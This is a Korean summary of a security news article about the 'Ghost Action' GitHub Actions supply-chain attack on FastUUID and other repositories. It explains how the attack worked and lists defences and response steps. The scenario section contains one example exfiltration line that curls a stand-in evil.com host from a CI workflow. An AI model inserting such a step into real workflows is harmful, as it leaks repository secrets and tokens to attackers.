[데일리시큐]깃허브 공급망 공격 ‘고스트액션‘, 3,325개 시크릿 유출…오픈소스 생태계 위협

내용 요약

오픈소스 생태계에서 ‘Ghost Action’이라는 대규모 공급망 공격이 드러났습니다. 연구팀은 FastUUID 프로젝트에 악성 GitHub Actions 워크플로우가 삽입되어 3,325개의 민감 정보가 유출됐다고 보고했습니다. 공격은 관리자의 GitHub 계정을 탈취해 워크플로우를 삽입하는 방식으로 진행되었습니다.

핵심 포인트

• Ghost Action: 대규모 공급망 공격으로, GitHub Actions를 악용해 오픈소스 리포에 악성 코드 삽입
• 정체불명 워크플로우: FastUUID에 삽입된 워크플로우가 외부로 민감 정보를 유출 (3,325개 항목)
• 계정 탈취 + 워크플로우 삽입: 유지관리자의 GitHub 계정을 빼앗아 악성 스크립트 실행

기술 세부 내용

1️⃣ GitHub Actions 워크플로우

• 정의: CI/CD 자동화 도구로, *.yml 파일에 스텝과 작업이 정의됨
• 공격 벡터: 관리자가 아닌 공격자가 인증된 계정으로 로그인 → 리포지토리에서 workflow 디렉터리에 악성 스크립트 삽입
• 유출 경로: 워크플로우 실행 시 외부 URL로 토큰·시크릿이 전송, 결과적으로 3,325개의 민감 정보가 노출

2️⃣ 공급망 보안(Software Supply Chain Security)

• 위험 요소:
  • 계정 탈취 → 리포지토리 전체 권한 확보
  • 외부 의존성 (예: actions/checkout)의 악성 버전 삽입
• 방어 전략:
  • Multi‑Factor Authentication (MFA) 필수화
  • workflow restrict 설정 → 신뢰할 수 있는 사용자만 워크플로우를 수정 가능
  • 시크릿 스캐닝: GitGuardian 같은 도구로 사전 검출
  • 코드 리뷰: 워크플로우 파일에 대한 PR 리뷰를 반드시 수행

3️⃣ FastUUID 예시

• 프로젝트 개요: 인기 파이썬 UUID 생성 라이브러리
• 공격 시나리오:
  1. 공격자 → GitHub 계정 탈취
  2. actions/ci.yml에 악성 run: curl https://evil.com/steal 삽입
  3. CI 실행 시 시크릿이 외부로 전송 → 데이터 유출

4️⃣ 대응 절차

1. 즉시 워크플로우 파일 검토 → 악성 스크립트 제거
2. 계정 MFA 재설정 및 비밀번호 변경
3. 시크릿 재생성 및 저장소에서 재배포
4. CI 로그 분석 → 유출 경로 재확인

마지막 팁
- GitHub는 allowed 목록 기능을 제공하므로, 신뢰할 수 있는 오픈소스만 사용하도록 제한을 두면 대다수 공격을 차단할 수 있습니다.
- 정기적으로 워크플로우 스캔을 자동화해 보안 위험을 최소화하세요.

 

출처: https://www.dailysecu.com/news/articleView.html?idxno=200191